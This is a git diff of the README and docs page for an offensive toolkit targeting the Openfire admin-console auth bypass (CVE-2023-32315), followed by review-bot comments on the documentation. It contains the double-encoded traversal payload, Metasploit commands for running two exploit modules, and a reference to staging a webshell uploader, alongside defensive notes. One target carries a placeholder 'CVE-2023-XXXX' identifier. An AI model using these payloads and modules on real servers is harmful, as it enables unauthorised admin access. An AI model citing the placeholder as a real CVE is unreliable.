diff --git a/README.md b/README.md index a49e8f9..6400c51 100644 --- a/README.md +++ b/README.md @@ -16,12 +16,12 @@ ## 🔥 Overview -**Openfire Exploit Suite** is a full-spectrum offensive toolkit targeting CVE-2023-32315 (Openfire Admin Console Auth Bypass). Built for red-teamers and researchers, it provides an end-to-end exploit workflow including recon, PoC execution, Metasploit integration, and Burp Extender automation. +**Openfire Exploit Suite** is a full-spectrum offensive toolkit targeting CVE-2023-32315 (Openfire Admin Console Auth Bypass) and a placeholder unauthenticated setup endpoint weakness (CVE-2023-XXXX). It provides an end-to-end exploit workflow including recon, PoC execution, Metasploit integration, and Burp Extender automation. ## 🧩 Modules - **exploit-core/**: Python PoC exploiting unauthenticated access to the Openfire admin console. -- **metasploit-module/**: Custom Ruby module compatible with Metasploit Framework. +- **metasploit-module/**: Custom Ruby exploit modules (admin bypass + setup POST). - **burp-automation/**: Java-based Burp Suite Extender plugin (minimal, Java 17). - **recon-tools/**: Bash toolkit chaining `nmap`, `ffuf`, and `nikto`, with auto-generated `.md` and `.html` reports. 
@@ -50,15 +50,18 @@ Expected output lines in Burp: > Note: If you want to extend detection (e.g., reflected params, XSS/SQLi heuristics), add a separate `ExploitLogic` class and wire it from `processHttpMessage`, but keep the final JAR free of local interface classes. -## 🚀 CVE-2023-32315 Summary +## 🚀 CVE Targets -Openfire ≤ 4.6.8 allows unauthenticated access to the admin interface via double-encoded path traversal: +| CVE | Module / PoC | Technique | File | +|-----|--------------|-----------|------| +| CVE-2023-32315 | Admin Console Auth Bypass | Double-encoded path traversal | `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb` | +| CVE-2023-XXXX (placeholder) | Unauth Setup POST | Residual setup endpoint parameter injection | `metasploit-module/exploits/linux/http/openfire_setup_unauth.rb` | + +Traversal example: ``` /setup/setup-s/%252e%252e/%252e%252e/admin-login.jsp ``` -Once accessed, an attacker can manually or programmatically upload a webshell, hijack sessions, or escalate to RCE under specific deployment conditions. - ## 🛠 Recon Flow Run: 
@@ -81,27 +84,43 @@ python3 exploit-core/openfire_exploit.py --target http://:9090 Checks if the bypass URL is accessible and optionally stages a webshell uploader. -## 🩸 Metasploit +## 🩸 Metasploit Modules -Use: +Admin bypass: ```bash use exploit/linux/http/openfire_admin_bypass -set RHOST +set RHOSTS run ``` -Module path: `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb` - +Unauth setup POST (parameter injection placeholder): +```bash +use exploit/linux/http/openfire_setup_unauth +set RHOSTS +set TARGETURI /setup/setup-someform.jsp # adjust if different +run +``` -## 📂 Git Strategy +Both modules live under: +``` +metasploit-module/exploits/linux/http/ +``` +If not copying into the core Metasploit tree, load the local path inside `msfconsole`: +```bash +loadpath /absolute/path/to/openfire-exploit-suite/metasploit-module/exploits +reload_all +``` -Each module is self-contained. Shared `.gitignore` excludes recon output, logs, and IDE artifacts. +## 📂 Git / Repository Slimming -All documentation is mirrored to `/docs/` for GitHub Pages deployment. To regenerate documentation, use: +The included `.gitignore` now excludes: +- Ruby / Bundler artifacts (`.bundle/`, `vendor/bundle/`, `*.gem`) +- Logs & temp (`log/`, `tmp/`, `coverage/`) +- Native build products (`*.o`, `*.so`, `*.dSYM/`) +- Ruby env files (`.ruby-version`, `.rbenv-vars`) +- IDE & build caches -```bash -./recon-tools/gen_docs.sh -``` +Feel free to add large scan outputs (`output/*.txt` or `*.html`) if you want a leaner commit history; sample patterns are commented. ## 📣 Credits @@ -111,7 +130,7 @@ Developed by Taka (2025) as a security research utility in response to active ex To view a rendered version of this documentation: -- [GitHub Pages: docs/index.md](docs/index.md) ← Mirror this README as index.md +- [GitHub Pages: docs/index.md](docs/index.md) ← Mirror of key README content - Hosting enabled via GitHub Pages > Settings > Pages > Source: `main /docs` ## 📸 Screenshots / Demo 
@@ -123,7 +142,7 @@ Live demo recording with CLI + browser-based confirmation (Burp interaction, FFU For defenders and system administrators: - Upgrade Openfire to **≥ 4.6.9** immediately. -- Disable `/setup/` path in production deployments. +- Disable or harden `/setup/` path in production deployments. - Use WAF to block double-encoded traversal attempts. -- Monitor logs for unusual access to `admin-login.jsp` +- Monitor logs for unusual access to `admin-login.jsp` and lingering setup JSPs. - Use Burp Collaborator or Canary Tokens to trace callback attempts. \ No newline at end of file diff --git a/docs/index.md b/docs/index.md index 19c9037..83a5f07 100644 --- a/docs/index.md +++ b/docs/index.md 
@@ -10,107 +10,79 @@ ## 🔥 Overview -**Openfire Exploit Suite** is a full-spectrum offensive toolkit targeting CVE-2023-32315 (Openfire Admin Console Auth Bypass). Built for red-teamers and researchers, it provides an end-to-end exploit workflow including recon, PoC execution, Metasploit integration, and Burp Extender automation. +**Openfire Exploit Suite** provides recon → PoC → Metasploit exploitation tooling for: +- CVE-2023-32315 (Admin Console Auth Bypass) +- Placeholder CVE-2023-XXXX (Residual setup POST endpoint abuse) ## 🧩 Modules -- **exploit-core/**: Python PoC exploiting unauthenticated access to the Openfire admin console. -- **metasploit-module/**: Custom Ruby module compatible with Metasploit Framework. -- **burp-automation/**: Java-based Burp Suite Extender plugin (minimal, Java 17). -- **recon-tools/**: Bash toolkit chaining `nmap`, `ffuf`, and `nikto`, with auto-generated `.md` and `.html` reports. +- **exploit-core/**: Python PoC for admin bypass. +- **metasploit-module/**: Ruby modules (bypass + setup POST injection). +- **burp-automation/**: Minimal Burp Extender. +- **recon-tools/**: Automated scanning + report generation. -## 🧠 Burp Extender Plugin (minimal) +## 🩸 Metasploit Modules -Entry point class (required by Burp): -``` -burp-automation/src/main/java/burp/BurpExtender.java +Admin bypass: +```bash +use exploit/linux/http/openfire_admin_bypass +set RHOSTS +run ``` -This class implements `IBurpExtender` and `IHttpListener` and logs basic request URLs. The packaged JAR intentionally includes only the entry class so that Burp’s own API types are used at runtime (avoids interface mismatches). 
- -Build and load into Burp: - +Unauth setup POST: ```bash -cd burp-automation -./gradlew clean build -jar tf build/libs/burp-automation.jar | sort # should list only: burp/BurpExtender.class (plus META-INF) +use exploit/linux/http/openfire_setup_unauth +set RHOSTS +set TARGETURI /setup/setup-someform.jsp +run ``` -In Burp Suite: Extender → Extensions → Add → `build/libs/burp-automation.jar` - -Expected output lines in Burp: -- `[BurpExtender] IHttpListener registered` -- `[HTTP] https://example/…` (for each intercepted request) - -> Note: If you want to extend detection (e.g., reflected params, XSS/SQLi heuristics), add a separate `ExploitLogic` class and wire it from `processHttpMessage`, but keep the final JAR free of local interface classes. +Module directory: +``` +metasploit-module/exploits/linux/http/ +``` +Local load (if not copied into framework tree): +```bash +loadpath /absolute/path/to/openfire-exploit-suite/metasploit-module/exploits +reload_all +``` ## 🚀 CVE-2023-32315 Summary -Openfire ≤ 4.6.8 allows unauthenticated access to the admin interface via double-encoded path traversal: +Double-encoded traversal to reach admin login: ``` /setup/setup-s/%252e%252e/%252e%252e/admin-login.jsp ``` -Once accessed, an attacker can manually or programmatically upload a webshell, hijack sessions, or escalate to RCE under specific deployment conditions. - ## 🛠 Recon Flow - -Run: ```bash cd recon-tools ./run_recon.sh ``` - -Output: -- `nmap_full_scan.txt` -- `ffuf_results.html` -- `nikto_results.txt` -- `recon_report.md`, `recon_report_*.html` +Generates: nmap_full_scan.txt, ffuf_results.html, nikto_results.txt, recon_report.md / HTML variants. ## 🐍 Python PoC - ```bash python3 exploit-core/openfire_exploit.py --target http://:9090 ``` -Checks if the bypass URL is accessible and optionally stages a webshell uploader. 
- -## 🩸 Metasploit - -Use: +## 🧠 Burp Extender +Entry: `burp-automation/src/main/java/burp/BurpExtender.java` +Build: ```bash -use exploit/linux/http/openfire_admin_bypass -set RHOST -run +cd burp-automation +./gradlew clean build ``` -Module path: `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb` - -## 📂 Git Strategy - -Each module is self-contained. Shared `.gitignore` excludes recon output, logs, and IDE artifacts. - -## 📣 Credits - -Developed by Taka (2025) as a security research utility in response to active exploitation trends. MIT Licensed. Use responsibly. - -## 📊 GitHub Pages - -To view a rendered version of this documentation: - -- [GitHub Pages: docs/index.md](docs/index.md) -- Hosting enabled via GitHub Pages > Settings > Pages > Source: `main /docs` - -## 📸 Screenshots / Demo - -Live demo recording with CLI + browser-based confirmation (Burp interaction, FFUF hits, webshell upload) coming soon. -- Suggest capturing GIFs via [asciinema.org](https://asciinema.org) or `peek` tool for animated command-line visuals. +## 📂 Repo Slimming +Key `.gitignore` patterns exclude Bundler, logs, coverage, native objects, IDE caches. Optionally extend to large `output/` artifacts. ## 🔐 Defensive Notes +- Upgrade to ≥ 4.6.9 +- Remove/lock `/setup/` after install +- Block double-encoded traversal at edge +- Monitor access to legacy setup JSPs -For defenders and system administrators: -- Upgrade Openfire to **≥ 4.6.9** immediately. -- Disable `/setup/` path in production deployments. -- Use WAF to block double-encoded traversal attempts. -- Monitor logs for unusual access to `admin-login.jsp` -- Use Burp Collaborator or Canary Tokens to trace callback attempts. \ No newline at end of file +## 📣 Credits +Research & tooling by Taka (2025). Use responsibly.
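Review bot: the rewritten Overview line in the README hunk at @@ -16 adds "CVE-2023-XXXX" as a second target; a placeholder identifier in the headline description reads like an assigned CVE and will be copied into scanners, tickets and search results as if it were one. Either keep the second weakness out of the Overview until an identifier exists, or state plainly that none is assigned, e.g. "and an unverified, unassigned setup-endpoint weakness (no CVE yet)", so nobody cites the placeholder as a real ID.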
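Review bot: the new CVE Targets table in the README hunk at @@ -50 drops the affected-version statement ("Openfire ≤ 4.6.8") and the impact sentence ("Once accessed, an attacker can ... escalate to RCE under specific deployment conditions") that the replaced summary carried, so the README no longer tells an administrator which versions are exposed or why the bypass matters. Add an "Affected versions" column (and a short impact note) to the table, and for the placeholder row mark the technique "Residual setup endpoint parameter injection" as unconfirmed rather than listing it beside a real CVE with the same standing.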
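Review bot: the Git / Repository Slimming paragraph at the end of the README hunk at @@ -81 says "Feel free to add large scan outputs (`output/*.txt` or `*.html`) if you want a leaner commit history", which states the opposite of the intent; the outputs should be added to `.gitignore`, e.g. "Add patterns for large scan outputs (`output/*.txt`, `output/*.html`) to `.gitignore` if you want a leaner history; sample patterns are commented." Separately, the `loadpath` line points at `.../metasploit-module/exploits`, while `use exploit/linux/http/openfire_setup_unauth` resolves against a modules root that contains `exploits/`; check whether `loadpath` should be given `.../metasploit-module` instead, otherwise the `use` commands shown just above will not find the modules. The `RHOST` to `RHOSTS` correction is good.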
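Review bot: the GitHub Pages hunk at @@ -111 changes the link text to "Mirror of key README content", but the previous hunk removed the `./recon-tools/gen_docs.sh` regeneration step, so the README no longer says how `docs/index.md` is produced or kept in sync; add a sentence naming the regeneration command, or state that the docs page is maintained by hand and which sections are intentionally omitted.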
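Review bot: "Disable or harden `/setup/` path" in the README hunk at @@ -123 is vaguer than the line it replaces; say what hardening means here, e.g. confirm the setup wizard is marked complete so the `/setup/` JSPs are not served, and restrict the admin console to trusted addresses. The untouched "Upgrade Openfire to ≥ 4.6.9" bullet is now the only version guidance in the README (hunk @@ -50 removed the "≤ 4.6.8" statement), so cite the vendor advisory's fixed versions for each supported branch rather than a single 4.6.x number. The expanded monitoring bullet could also point at what the traversal looks like in access logs, namely `%252e%252e` sequences under `/setup/`, which matches the WAF bullet above it.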
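Review bot: the docs/index.md hunk at @@ -10 loses content that the README keeps, so the page no longer mirrors it: the `set TARGETURI /setup/setup-someform.jsp` line drops the "adjust if different" comment, so a docs reader will run the placeholder path literally; the Burp Extender section drops the `jar tf build/libs/burp-automation.jar | sort` check that confirms the JAR contains only `burp/BurpExtender.class`, which the README gives as the reason the extension loads without interface mismatches; the Defensive Notes drop the Collaborator / Canary Token callback-tracing bullet and the product name from the upgrade line ("Upgrade to ≥ 4.6.9"); and Credits drops the MIT license statement. Either generate this page from the README or keep these items in both copies.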